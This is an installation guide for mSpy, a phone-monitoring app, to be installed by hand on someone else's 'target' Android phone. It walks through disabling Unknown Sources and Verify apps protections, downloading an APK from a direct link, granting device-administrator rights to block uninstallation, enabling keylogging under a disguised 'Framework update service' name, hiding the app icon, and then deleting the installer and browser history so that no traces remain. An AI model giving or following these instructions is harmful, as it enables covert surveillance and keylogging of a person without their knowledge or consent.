In order to install mSpy on the target Android device you need to have that device in your hands and an Internet connection should be available.It is important to understand that due to high level of customization of Android OS the steps from the following guide might differ from what you will see on the actual phone. However, all the menu sections are similar and you will be able to easily find your way through. For example, instead of ‘Applications’ you might see ‘Apps’, ‘Application manager’ or Manage Application.
Before you start the installation please make sure that on your target device in Settings → Security there is a check mark next to Unknown Sources. It is also recommended to remove a check mark from Verify apps.
1. From the Home screen open All Apps (list of all available applications) and choose Google Chrome
2. Once you see the homepage of the Chrome enter http://b55y.net/a in the URL-bar and press Go from the keypad. After that you will see a screen with captcha with a code you need to enter to start downloading process.
Please note: http://b55y.net/a is a direct-download link which will NOT open you any new webpages, but will simply start the download on the background (little message should pop-up informing you that the download started).
3. You can now go back to the to All Apps from your Home screen and choose Downloads where you will see the bt.apk file. Tap on the bt.apk file and the installation will begin.
1. After opening the bt.apk file you will need to follow the sequence: Next → Install → Open.
2. Read EULA carefully, put checkmark next to Accept license agreement to proceed.
3. Activate Prevent uninstall option
4. Hit Activate button to prevent removal and activate device administrator
5. Activate Keylogger tracking option, it will forward you to the new window > tap on Framework update service and switch it ON.
6. Activate Allow collecting data option, it will forward you to the new window > tap on Framework update service > Allow usage access
7. Select if you want the icon to be visible
Now you can delete the bt.apk file from the Downloads. Check the file (or tap and hold) and you will see the trash bin sign on top. Tap it to delete selected file
and also you can clear browsing history by going to Browser → tap Menu button → Settings → Security & Privacy → Clear Browsing history.
And there are no longer any traces of mSpy on the target device!